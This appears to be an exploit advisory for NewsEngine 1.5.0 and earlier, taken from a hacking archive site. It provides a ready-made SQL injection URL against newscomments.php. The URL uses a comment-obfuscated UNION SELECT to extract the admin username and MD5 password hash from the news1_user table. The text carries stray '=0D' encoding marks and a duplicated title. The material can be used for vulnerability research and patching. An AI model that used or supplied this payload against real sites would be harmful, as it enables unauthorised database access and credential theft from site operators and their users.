ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability=0D
# Author : ajann=0D
=0D
### Vulnerability;=0D
=0D
$$$ http://[target]/[path]/newscomments.php=0D
=0D
Example:=0D
=0D
$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*=0D
=0D
Admin MD5 HaSh
The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.
